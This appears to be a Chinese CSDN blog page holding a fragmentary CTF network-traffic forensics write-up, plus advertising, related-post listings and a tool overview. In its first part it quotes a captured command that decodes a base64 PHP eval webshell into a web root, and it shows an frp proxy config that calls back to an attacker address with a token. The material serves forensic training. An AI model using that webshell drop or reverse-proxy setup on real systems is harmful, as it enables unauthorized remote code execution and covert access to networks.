CTF流量分析

最新推荐文章于 2024-10-22 21:25:59 发布
最新推荐文章于 2024-10-22 21:25:59 发布
阅读量827 收藏 8
点赞数 6
分类专栏: 程序员 文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_84970893/article/details/138961954
版权

思路:http.request.method ==“POST” && http contains “php”,追踪流,找到variable=1&tpl=data/Runtime/Logs/Home/21_08_07.log&aaa=system(‘echo PD9waHAgZXZhbCgkX1JFUVVFU1RbZXNGXSk7Pz4=|base64 -d > /var/www/html/1.php’)

题目三:找到攻击者使用的WebShell,并对WebShell密码计算md5,示意:md5(password),提交32位md5值为flag

题目四:黑客上传的代理工具的回连地址端口,并对地址端口计算md5,示意:md5(10.10.10.10:8080),提交32位md5值为flag

思路:先找使用了什么代理工具,再查看代理工具配置文件。http.request.method ==“POST” && http contains “php”,可以看出使用的代理工具为frp,接下来继续追踪流找frpc.ini文件内容,看写入了什么。

找j68071301598f写入的内容,且排除前两位再用base64解密,找到frpc.ini文件

找到后,解密后面的16进输入。

[common] server_addr = 192.168.157.111 server_port = 8888 token=fY4e3vcrSYAHjjFKzKK8

题目五:黑客上传的代理工具socks5的账号密码,并计算账号、密码的md5,示意:md5(username#password),提交32位md5值为flag

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

s/618653875)

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

流量分析ctf
m0_53067332的博客
01-10 8777
题目介绍 该题为流量分析,当黑客入侵我们的网络是,我们可以需要通过一系列分析操作来进行抓捕与追踪,本题目难度中等偏下,不是很有难度,但题目类型较为全面,适合入手当做练习。 一、题目背景 某公司内网网络被黑客渗透,简单了解,黑客首先攻击了一台web服务器,破解了后台的账户密码,随之利用破解的账号密码登陆了mail系统,然后获取了vpn的申请方式,然后登陆了vpn,在内网pwn掉了一台打印机,请根据提供的流量包回答下面有关问题 二、关卡列表 1 某公司内网网络被黑客渗透,请分析流量,给出黑客使用的扫描器 2 某
网络安全必看流量分析经典解析----10道CTF题我是怎么完成的
最新发布
qq_41314882的博客
04-14 1103
某公司内网网络被黑客渗透,简单了解,黑客首先攻击了一台web服务器,破解了后台的账户密码,随之利用破解的账号密码登陆了mail系统,然后获取了vpn的申请方式,然后登陆了vpn,在内网pwn掉了一台打印机,请根据提供的流量包回答下面有关问题。这明显就有问题,如果说一个正常的网站,images下放的是图片,但这里放了一个a.php很让人怀疑是一句话木马,而且啊,在老师的教学中,为了方便起文件直接a.php或者b.php等,所以怀疑这里大概率是有问题了,我们对其中一个进行tcp追踪。
流量分析----CTF
qq_38390532的博客
05-02 1万+
某公司内网网络被黑客渗透,简单了解,黑客首先攻击了一台web服务器,破解了后台的账户密码,随之利用破解的账号密码登陆了mail系统,然后获取了vpn的申请方式,然后登陆了vpn,在内网pwn掉了一台打印机,请根据提供的流量包回答下面有关问题
CTF 流量包相关-流量分析(1)
qq_56815564的博客
04-28 1万+
前面的flag不论是直接给你明文,还是有一定的编码,都是比较简单的,像这些十成甚至九成都会是签到题,所以了解一下知道有这种情况就好,重点不再这边另外这里还是给出一下风佬的脚本吧,虽然我感觉用到的几率应该不会很大,如果要用的话,那个破空查flag的工具应该会比较好用,下载的话,风佬的git里面应该有,这里就不给了。
CTF——流量分析题型整理总结
热门推荐
小锤队长的博客
12-19 5万+
我见过的流量分析类型的题目总结: 一,ping 报文信息 (icmp协议) 二,上传/下载文件(蓝牙obex,http,难:文件的分段上传/下载) 三,sql注入攻击 四,访问特定的加密解密网站(md5,base64) 五,后台扫描+弱密码爆破+菜刀 六,usb流量分析 七,WiFi无线密码破解 八,根据一组流量包了解黑客的具体行为 例题: 一,ping 报文信息 (icm...
网络安全CTF流量分析-入门8-攻击流量行为分析_流量分析cookie的md5(1)
2401_84545016的博客
05-14 554
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
网络安全CTF流量分析-入门1-流量分析中的Sql注入
m0_51198141的博客
08-29 1658
一般流量除非是加密或者不常见的协议,否则通常都建议打开导出==>HTTP查看报文大致信息。经过观察,发现是逐个读取尝试试验ASCII码,通过返回包的大小来进行校验。如果不了解Sql注入的可以先去学习一下Sql注入。通过排序后,可以看到是从第一位爆破到第25位。打开数据包观察是HTTP报文为主。这里观察到了Sql流量的特征。获得正确值返回包大小是704。获得错误值返回包大小是720。这里可以根据大小排序。Ascii码转码得到。
网络安全CTF流量分析-入门8-攻击流量行为分析_流量分析cookie的md5
2301_82056337的博客
05-04 484
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
ctf流量分析练习二
gclome的博客
09-06 3848
上次的流量分析做的我一个脑袋两个大!但是不能放弃啊,再找一些题来练练手 0x01 经典题型 CTF题型主要分为流量包修复、WEB流量包分析、USB流量包分析和其他流量包分析。 01 流量包修复 比赛过程中有可能会出现通过wireshark打开题目给的流量包后提示包异常的情况,如下图所示: 解题思路: 通过在线pacp包修复工具进行修复: http://f00l.de/hacking/pcapfix.php 修复之后,再次打开 用tcp contains “flag”,找到了下面这句话: 于是乎,flag就在
CTF流量分析
m0_37442062的博客
05-03 4269
1.flag被盗了,pcap(gnnl) 尝试http过滤,get或者post追踪tcp流即可,这里是post, flag{This_is_a_f10g} 2.这么多数据包找找吧,先找到getshell的流pcap(vn78) 过滤tcp TCP流通常是命令行操作 Q0NURntkb195b3VfbGlrZV9zbmlmZmVyfQ== 解码:CCTF{do_you_like_sniffer} 3.有一天皓宝宝没了流量只好手机来共享,顺便又从手机发了点小秘密到电脑,你能找到它吗?
关于流量分析题目的解析
TJHder的博客
03-19 3953
展示一部份吧,我们将它先利用hex转化为ascii,然后这个是一个埃及文,意思是说要进行一个zip文件格式的保存然后利用notepad++进行一个ascii的转换即可得到一个docx(word文档),里面就有flag!我们将这个字节流保存下来,然后用工具发现它是一个jpg格式的图,于是以jpg的格式进行保存下来于是我们就可以看到密码是多少,然后我们将这个密码带入进去就可以得到我们需要的flag。先在kali里面用弱口令去进行爆破,然后将密码带入并生成一个1.pcap的文件打开后,查找http协议的即可。
2021-10-09 CTF-KX(第一场)-简单的流量分析2
matthewfjnd的博客
10-09 1334
题目所需文件 https://download.youkuaiyun.com/download/matthewfjnd/30047752 首先先用wireshark打开流量包,并搜索关键字flag,发现一个flag.zip的数据包 查看一下前后的数据流量包,发现了FTP传输flag.zip的痕迹 FTP是明文传输协议,我们可以直接将flag.zip的数据包导出,并保存为flag.zip文件 打开zip文件,发现需要密码 接着去数据包里面找密码,我们发现,流量包里除了一个flag.zip的文件外,还有一个pas
CTFmisc流量分析题(详细)
2406_87429010的博客
10-22 798
发现账号name密码word,根据提示拼接账号密码,并将其放入MD5哈希生成器中,输出1d240aafe21a86afc11f38a45b541a49包上flag即可提交。发现一长串的base64编码,我们猜测可能是解码得到图片,我们将base64编码复制下来,将其解码成图片。下载后打开文件,查找http协议,跟踪后发现有一个fenxi.php我们查看。下载后发现是一个流量,打开后过滤http协议,然后追踪HTTP流。我们下载这个文件打开发现全是tcp流,我们直接追踪就好。查看TCP流,点击查找flag。
两道CTF流量分析题分享
seek_2022的博客
03-10 2946
本文分享了两道CTF流量分析题,分析的过程充满着许多乐趣,希望本文分享的两道题的分析对大家学习相关技能有帮助。
CTF流量分析1
qq_45766280的博客
08-26 1057
流量分析1题解:总结 仅作为学习笔记使用 题目:Q3.pcap 题解: 先在wireshark里看一下 有HTTP先看HTTP,直接在过滤器中选择HTTP 这些包就有意思了,这些请求有些想目录扫描在不断的请求,而大部分的回应都是404,那么我们暂时推断会有访问成功的,往后面找找吧。 这两个语句成功通过了,那我们来详细分析分析这两个包。追踪流->HTTP GET /?c=print_r(gzcompress(file_get_contents(base64_decode(%22aW5kZXguc
CTF 流量包相关-流量分析(2) RSA密钥流 traffic讲解
qq_56815564的博客
05-19 2302
本文是根据b站-风二西大佬的视频边做题边总结写成的,可以去支持一下风佬,风佬太强辣!!!另外上一期其实也可以看看的说,这一篇是上一期的后续吧然后后面那单独一道题,风佬也有视频在但老实说,我觉得风佬磁性的声音将起来有点抽象,自己理解还是好一点的,这里不是说风佬的不好啊(疯狂保命)
CTF流量分析-题集2-[闽盾杯 2021]DNS协议分析
m0_51198141的博客
11-30 2231
网络安全流量分析CTFDNS协议
ctf流量分析
03-10
<think>嗯,用户想知道在CTF竞赛中进行流量分析的技术和工具。首先,我需要回忆之前学过的相关知识,以及参考提供的引用内容。引用1提到网络流量分析需要协议知识、工具使用和识别异常行为,引用3提到了用Wireshark过滤HTTP报文并追踪流,引用2和4可能涉及学习资料和技巧。 首先,工具方面,Wireshark肯定是最常用的,用户可能需要知道如何过滤数据包,比如用http.request.method == "GET"这样的过滤语句。此外,tshark作为命令行工具可能对自动化处理有帮助。还有其他工具比如Network Miner提取文件,或者Zeek生成日志文件。这些工具的使用方法需要简要说明。 然后是分析技术,用户可能需要了解协议解析,比如HTTP、DNS、TCP等,如何识别异常流量,比如大文件传输或非常规端口。数据提取方面,比如导出传输的文件或字符串搜索flag,这里可以提到binwalk或strings命令。另外,时间戳分析可能用于隐蔽通信,比如引用3提到的追踪HTTP流的方法。 实战步骤可能需要分步讲解,比如先检查协议分层,过滤可疑流量,追踪流,提取文件,搜索关键字。这部分要结构清晰,方便用户一步步操作。 最后,相关问题的生成需要围绕技术深入、工具比较和实战案例,比如如何分析DNS隐蔽隧道,或者比较Wireshark和Tshark的优劣。要确保问题有针对性,帮助用户进一步学习。 需要检查是否符合用户不可见的指令,比如数学公式的格式是否正确,中文回答,生成问题等。还要确保引用正确,比如引用1、3和2在适当的位置添加标识。可能引用4是关于学习资料,可以放在推荐资料部分。 总结下来,回答的结构应该是先工具介绍,再技术解析,然后实战步骤,最后推荐资料和相关问题。每个部分都要简明扼要,结合实例,比如引用3中的HTTP流追踪实例,让回答更具体实用。</think>### CTF竞赛中的流量分析技术与工具指南 #### 一、核心工具 1. **Wireshark** - 功能:支持协议解析、流量过滤、数据包重组,可快速定位异常流量 - 关键操作: - 过滤语句:`http.request.method == "GET"`(HTTP请求过滤) - 数据提取:`File → Export Objects → HTTP` 提取传输文件 - 流追踪:右键数据包选择`Follow → TCP Stream/HTTP Stream`[^3] 2. **Tshark(命令行版Wireshark)** - 适用场景:自动化处理大型流量文件 - 示例命令: ```bash tshark -r capture.pcap -Y "dns.qry.name contains flag" -T fields -e dns.qry.name ``` 3. **Network Miner** - 特色功能:自动提取文件、证书、会话信息,可视化展示网络拓扑 4. **Zeek(原Bro)** - 高级应用:生成`conn.log`、`http.log`等结构化日志,支持自定义脚本检测异常行为 #### 二、关键技术 1. **协议特征分析** - HTTP协议:关注非常规状态码(如`200 OK`传输非文本内容)、非常规请求头 - DNS协议:检测`TXT`记录、超长域名请求(可能包含Base64编码数据) - TCP/UDP异常:非常规端口通信、数据包长度规律性变化 2. **隐蔽信道识别** - 时间戳分析:数据包间隔时间符合特定数学分布(如泊松分布) - 载荷隐写:通过LSB隐写、协议字段冗余位嵌入数据,需结合`binwalk`或`foremost`提取 3. **数据重组技巧** - 文件提取:通过文件签名(如`PK`对应ZIP文件)识别片段数据 - 流量镜像:使用`tcpreplay`重放流量观察系统反应 #### 三、实战操作流程 1. **初步筛查** - 执行`Statistics → Protocol Hierarchy`查看协议占比 - 过滤高频率IP:`ip.src == 192.168.1.100 && tcp.port != 80` 2. **深度分析** ```python # 示例:使用Scapy提取DNS查询记录 from scapy.all import * packets = rdpcap('dns.pcap') for pkt in packets: if pkt.haslayer(DNSQR): print(pkt[DNSQR].qname) ``` 3. **Flag提取** - 字符串搜索:`strings capture.pcap | grep -i "flag{"` - 十六进制查看:Wireshark中按`Ctrl+F`选择`Hex Value`搜索特定字节序列 #### 四、推荐学习资料 《CTF中的网络流量分析:工具、技术与实战案例》提供20+真实场景分析模板[^1],《2024网络安全学习资料》包含流量分析专项训练模块[^4]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值